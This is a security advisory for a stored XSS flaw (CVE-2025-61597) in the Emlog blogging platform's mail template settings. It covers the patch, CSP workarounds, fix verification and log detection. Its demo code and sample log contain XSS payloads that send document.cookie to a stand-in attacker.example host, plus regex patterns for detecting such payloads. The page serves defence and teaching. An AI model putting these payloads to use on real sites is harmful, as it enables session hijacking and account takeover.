CVE-2025-61597

7.6 HIGH

📋 TL;DR

Emlog versions 2.5.21 and below contain a stored cross-site scripting (XSS) vulnerability in the mail template settings. An attacker who already holds admin access can store JavaScript in a template field; it then runs in the browser of any other admin who opens the settings page, with that admin's session, which is enough to hijack the session and take over the account. Every installation on a vulnerable version is affected, default configuration included.

💻 Affected Systems

Products:
  • Emlog
Versions: 2.5.21 and below
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires admin access to exploit; affects all installations with default configuration.

📦 What is this software?

Emlog is an open-source blogging platform and lightweight CMS written in PHP with a MySQL backend. The affected code is the mail template settings page of its web admin panel.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete admin account takeover leading to website defacement, data theft, backdoor installation, and further server compromise.

🟠

Likely Case

The injected script runs with the viewing admin's session. It can steal the session cookie if that cookie is not HttpOnly, but it does not need to: it can issue authenticated requests directly from the victim's browser to modify content, install plugins or read sensitive data.

🟢

If Mitigated

With output encoding in place the stored value is rendered inert on the settings page, so the impact is confined to the admin interface with no data exfiltration. A CSP that blocks inline script and restricts where the page may connect further limits what any residual injection could do.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploit requires admin credentials; proof-of-concept available in GitHub advisory.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.5.22

Vendor Advisory: https://github.com/emlog/emlog/security/advisories/GHSA-hj97-hp2c-6m4m

Restart Required: No

Instructions:

1. Back up the Emlog installation and its database.
2. Download version 2.5.22 from the official repository.
3. Replace all installation files with the new version.
4. Verify the fix: save a harmless marker such as <b>xsscheck</b> in a mail template field and confirm the settings page source shows it encoded (&lt;b&gt;) rather than as live markup.
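What step 4 is checking, shown as an added illustration that is not Emlog's source code: the vulnerable form drops the stored template value into an HTML attribute unchanged; an incomplete fix encodes only < and >; the hardened form encodes quotes as well. Emlog is PHP, where the hardened variant is htmlspecialchars($v, ENT_QUOTES, 'UTF-8'); Python's html.escape(quote=True) is used here as its equivalent. The field name mail_tpl, the two payloads and the attacker.example host are constructed for the demo.

```python
"""Stored XSS in a settings form: three ways to render a stored value.

Illustrative example added to this page, not Emlog's code. The field
name, the payloads and the attacker.example host are constructed.
"""
import html
from html.parser import HTMLParser

# Constructed payloads an admin-level attacker could store in the template.
# The first closes the attribute and opens a script element; the second
# contains no < or > at all, so it survives fixes that only handle brackets.
PAYLOAD_SCRIPT = '"><script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
PAYLOAD_HANDLER = '" autofocus onfocus="new Image().src=\'https://attacker.example/?c=\'+document.cookie'


def render_vulnerable(value: str) -> str:
    """Unpatched behaviour: the stored value is interpolated unchanged."""
    return f'<input type="text" name="mail_tpl" value="{value}">'


def render_angle_brackets_only(value: str) -> str:
    """Incomplete fix: encodes < > & but leaves quotes alone."""
    return f'<input type="text" name="mail_tpl" value="{html.escape(value, quote=False)}">'


def render_hardened(value: str) -> str:
    """Correct fix for an attribute context: quotes are encoded too."""
    return f'<input type="text" name="mail_tpl" value="{html.escape(value, quote=True)}">'


class _InjectionFinder(HTMLParser):
    """Records script elements and on*/javascript: attributes as the
    tokeniser sees them, i.e. after attribute values are unescaped."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, val in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag}@{name} handler")
            elif val and val.strip().lower().startswith("javascript:"):
                self.findings.append(f"{tag}@{name} javascript: URL")


def injected_findings(rendered: str) -> list:
    """Return what a browser would execute from the rendered markup."""
    p = _InjectionFinder()
    p.feed(rendered)
    p.close()
    return p.findings


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable),
                          ("angle-brackets-only", render_angle_brackets_only),
                          ("hardened", render_hardened)):
        for payload in (PAYLOAD_SCRIPT, PAYLOAD_HANDLER):
            print(f"{label:20s} {injected_findings(render(payload)) or 'clean'}")
```

The parser-based check is the same test as the manual "Verify Fix Applied" step later on this page: what matters is whether the browser's tokeniser ends up with a script element or an event-handler attribute, not whether the literal string <script> appears. The second payload never uses angle brackets, which is why stripping tags, or a WAF rule that only matches <script>, is not a fix.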

🔧 Temporary Workarounds

Disable mail template editing

Applies to: all

Remove or restrict access to the mail template settings page for non-essential admins. This stops new payloads from being stored; it does not remove one that is already there, so inspect the current template values (in the database or the page source) before relying on it.

Implement Content Security Policy

Applies to: all

Add CSP headers so the browser refuses inline and third-party script on the admin pages:

Add to .htaccess (requires mod_headers): Header set Content-Security-Policy "default-src 'self'; script-src 'self'"
Add to nginx config: add_header Content-Security-Policy "default-src 'self'; script-src 'self'";

Caveats: script-src 'self' without 'unsafe-inline' also blocks the admin panel's own inline scripts, so roll the policy out as Content-Security-Policy-Report-Only first and check the browser console before enforcing it; in nginx, an add_header in a location block replaces, rather than extends, the headers inherited from the server block. The policy does not remove a payload that is already stored, and it does not stop injected non-script HTML such as a fake login form.

🧯 If You Can't Patch

  • Restrict admin access to trusted IP addresses only.
  • Implement web application firewall (WAF) rules to block XSS payloads in POST requests to the admin path. Treat this as detection rather than prevention: the attacker already holds admin credentials, and payloads can be URL- or entity-encoded or avoid <script> altogether (event-handler attributes, javascript: URLs).

🔍 How to Verify

Check if Vulnerable:

Check the Emlog version in the admin panel, or query the options table (default table prefix emlog_; adjust if your installation uses another): SELECT * FROM emlog_options WHERE option_name='emlog_version'

Check Version:

Check the admin dashboard, or search the installed files: grep -ri "emlog_version" /path/to/emlog/

Verify Fix Applied:

On a staging copy, save a harmless marker such as <b>xsscheck</b> in a mail template field, reload the settings page and read the page source: a patched build shows the marker encoded (&lt;b&gt;xsscheck&lt;/b&gt;), a vulnerable one renders it as live markup. Check the attribute context as well: a marker containing a double quote must not close the input's value attribute.

📡 Detection & Monitoring

Log Indicators:

  • Unusual admin login patterns
  • Multiple failed login attempts followed by successful login
  • POST requests to the mail template settings whose body contains script tags, event-handler attributes (on*=) or javascript: URLs, in plain or URL-encoded form (requires request-body logging at the proxy or WAF; stock access logs do not record POST bodies)

Network Indicators:

  • Outbound connections to suspicious domains from admin sessions
  • Unusual traffic patterns from admin interface

SIEM Query:

Pseudo-query; adjust the URI to your installation's actual mail template settings endpoint under /admin/, and note that the body field exists only if request bodies are logged:

source="web_logs" AND method="POST" AND uri STARTSWITH "/admin/" AND (body CONTAINS "<script" OR body CONTAINS "%3Cscript" OR body CONTAINS "javascript:" OR body CONTAINS "onerror=" OR body CONTAINS "onfocus=" OR body CONTAINS "onload=")
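The query above presumes the request body is in the log, which a stock Apache or nginx access log does not provide. As an added example (not from the advisory or from Emlog), the following scans JSON-lines records from a reverse proxy or WAF that does log bodies, URL- and entity-decodes each body first so encoded payloads are not missed, and restricts the match to POSTs under the admin path. The record fields, the /admin/setting.php URI and the log lines themselves are constructed for the demo and must be adapted to your own log schema.

```python
"""Hunt for stored-XSS payloads in admin POST bodies.

Added detection example for this page, not a vendor tool. Assumes a proxy
or WAF that writes one JSON record per request including the body; field
names, the URI and the sample records are constructed.
"""
import html
import json
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample: a benign save, a plain <script> payload, a URL-encoded
# event-handler payload (no angle brackets, so a naive "<script>" match
# misses it), and a GET that must not be flagged.
SAMPLE_LOG = r"""
{"ts":"2025-10-09T10:00:01Z","src":"203.0.113.10","method":"POST","uri":"/admin/setting.php","body":"mail_tpl=Hello+%7Buser%7D%2C+thanks+for+commenting"}
{"ts":"2025-10-09T10:02:14Z","src":"198.51.100.7","method":"POST","uri":"/admin/setting.php","body":"mail_tpl=%3Cscript%3Enew+Image().src%3D%22https%3A%2F%2Fattacker.example%2F%3Fc%3D%22%2Bdocument.cookie%3C%2Fscript%3E"}
{"ts":"2025-10-09T10:03:30Z","src":"198.51.100.7","method":"POST","uri":"/admin/setting.php","body":"mail_tpl=%22+autofocus+onfocus%3D%22alert(document.domain)"}
{"ts":"2025-10-09T10:04:00Z","src":"203.0.113.10","method":"GET","uri":"/admin/setting.php","body":""}
""".strip()

# Applied to the decoded, lower-cased body. The handler list is a starting
# point; a bare "on[a-z]+=" would also match harmless parameter names such
# as "option=".
XSS_PATTERNS = {
    "script tag": re.compile(r"<\s*script\b"),
    "event handler": re.compile(
        r"\bon(load|error|focus|blur|click|mouseover|mouseenter|input|change|submit|toggle|animationstart)\s*="),
    "javascript: url": re.compile(r"javascript\s*:"),
    "active element": re.compile(r"<\s*(iframe|svg|img|object|embed|math)\b"),
}


def normalize(body: str) -> str:
    """Undo the encodings an attacker can hide behind before matching."""
    s = unquote_plus(body)      # form encoding: '+' is a space, %XX decoded
    if "%" in s:                # double-encoded, e.g. %253C -> %3C -> <
        s = unquote(s)
    s = html.unescape(s)        # &#x3c;script&#x3e; and friends
    s = s.replace("\x00", "")   # NUL bytes that some filters choke on
    return re.sub(r"\s+", " ", s).lower()


def scan(log_text: str, admin_prefix: str = "/admin/") -> list:
    """Return one hit per POST under admin_prefix whose body matches."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        if rec.get("method") != "POST" or not rec.get("uri", "").startswith(admin_prefix):
            continue
        norm = normalize(rec.get("body", ""))
        matched = [name for name, rx in XSS_PATTERNS.items() if rx.search(norm)]
        if matched:
            hits.append({"ts": rec.get("ts"), "src": rec.get("src"),
                         "uri": rec["uri"], "patterns": matched})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} {hit['uri']} -> {', '.join(hit['patterns'])}")
```

Decoding before matching is the part that matters: the third record carries its payload as %22+autofocus+onfocus%3D%22..., which the raw-string query above would only catch if someone thought to add that exact encoded form. Because the attacker is a legitimate admin, correlate hits with the source address and time of the session rather than alerting on the admin login alone.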

🔗 References

  • Vendor advisory (GitHub Security Advisory GHSA-hj97-hp2c-6m4m): https://github.com/emlog/emlog/security/advisories/GHSA-hj97-hp2c-6m4m
